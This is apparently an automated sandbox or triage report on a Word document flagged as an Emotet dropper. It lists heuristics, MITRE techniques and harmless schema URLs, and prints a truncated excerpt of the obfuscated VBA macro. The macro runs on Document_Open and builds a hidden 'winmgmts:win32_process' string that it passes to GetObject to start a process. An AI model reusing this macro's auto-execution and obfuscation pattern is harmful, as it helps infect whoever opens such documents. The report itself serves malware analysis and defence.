Verdict: MALICIOUS
Risk Score: 264
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Emotet-7572661-0, indicating it's a known Emotet variant. The presence of a Document_Open macro and obfuscated VBA code strongly suggests it's designed to download and execute a secondary payload. The VBA code uses obfuscation techniques and calls GetObject, consistent with Emotet's behavior.
Heuristics (7)
- ClamAV: Doc.Dropper.Emotet-7572661-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Emotet-7572661-0
- VBA project inside OOXML (medium, 3 related findings, OOXML_VBA): Document contains a VBA project (VBA macros present)
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8692 bytes | f576441decd9c5abba082cf895d8072fa89005c5c54232d594e1e36d2c480702 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Eupvgyresx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
pl34 _
= "{TipTopPo}"
j3u = Edmotpdqfkjxh + Auacaaomtv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Mdmadoavics + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qsioczduna)
ndko24 = "{TipTopPo}"
nsih6 = 239 + 893 + 636
akj3 = 868 + 756
kqkqn4 = (Ivxqrtswzq) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kgjgidybdsji
Mplapgma.Pqsdmifqouiss
End Sub
Attribute VB_Name = "Yuqmslzswwycl"
Attribute VB_Base = "0{579E53AB-BE00-459F-8F0D-F494EBF40C6B}{34353EDD-D899-46E5-B121-745F0A40376F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Mplapgma"
Function Pqsdmifqouiss()
pl34 _
= "{TipTopPo}"
j3u = Bjofvbhxhhko + Kxebzguhiid
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Poivfccvwpsk + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zedoebhbhyg)
ndko24 = "{TipTopPo}"
nsih6 = 807 + 124 + 223
akj3 = 793 + 964
kqkqn4 = (Xuafbvisi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Eleuoilqrs
Qssxvhhq = "/34//22/778//0//3/wi/34//22/778//0//3/nm/34//22/778//0//3/g/34//22/778//0//3/mt/34//22/778//0//3/" + ChrW(Int(wdKeyS)) + "/34//22/778//0//3/:w/34//22/778//0//3/in/34//22/778//0//3/32/34//22/778//0//3/_" + Yuqmslzswwycl.Vaumcniw + "r/34//22/778//0//3/oc/34//22/778//0//3/e/34//22/778//0//3/s/34//22/778//0//3/s"
pl34 _
= "{TipTopPo}"
j3u = Zwuzcutxi + Kpaghoeojudaf
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Gekzvdqwy + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Dquwwzdaifakg)
ndko24 = "{TipTopPo}"
nsih6 = 508 + 944 + 171
akj3 = 872 + 190
kqkqn4 = (Kjkwwpuwoo) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Gsutbpilou
Quaaasngkwx = Varxdtkcwm(Qssxvhhq)
pl34 _
= "{TipTopPo}"
j3u = Brxdamqi + Dljucipzxqwq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Lzpgiixekkc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Gunvpxsw)
ndko24 = "{TipTopPo}"
nsih6 = 698 + 358 + 246
akj3 = 348 + 180
kqkqn4 = (Nywjbdagkzi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Xjzrxzbz
Set Hgfvzjsefnnn = GetObject(Quaaasngkwx)
pl34 _
= "{TipTopPo}"
j3u = Tzxxvzdfma + Cxwqcnkqtc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qzyjcjxbmb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ismsttnhmvyt)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 875 + 999
akj3 = 584 + 338
kqkqn4 = (Yizntrjm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Btdcdsxaochjb
Qvxgssfdwu = Yuqmslzswwycl.Igcttfmk.Tag
pl34 _
= "{TipTopPo}"
j3u = Yfknkqvg + Xwhnszpxtg
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Cefaxqhmxjnb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nmvhmongtodmc)
ndko24 = "{TipTopPo}"
nsih6 = 251 + 170 + 847
akj3 = 436 + 660
kqkqn4 = (Pbkihdghktey) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Nifoulcclt
Hunodmcel = Quaaasngkwx + ChrW(Int(wdKeyS)) + Yuqmslzswwycl.Kcayeyzlzbvf.Tag + Qvxgssfdwu
pl34 _
= "{TipTopPo}"
j3u = Bhevvreldf + Owjhskmqv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Rhtstnmlgin + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zdyaifmhxkjji)
ndko24 = "{TipTopPo}"
nsih6 = 196 + 747 + 874
akj3 = 414 + 347
kqkqn4 = (Fmlqtunnbzkx) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ixaljiolliqv
Zwndiejpwjmo = Hunodmcel + Yuqmslzswwycl.Vaumcniw
pl34 _
= "{TipTopPo}"
j3u = Qhofmcqavggcn + Kamhfpcwxjsnc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Bgusarqf + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Eafgyzhkitogj)
ndko24 = "{TipTopPo}"
nsih6 = 856 + 603 + 957
akj3 = 372 + 425
kqkqn4 = (Olrvtporsf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ueitvzjbo
Set Rcyklzqzxbej = Figrtjza(Zwndiejpwjmo)
pl34 _
= "{TipTopPo}"
j3u = Stkqami
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 56832 bytes | a95c60b9f1b12ce0318b49db6f0149dba894f256011dde34f464c69e9153d383 |
Detection
- ClamAV: Doc.Dropper.Emotet-7572661-0
- Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))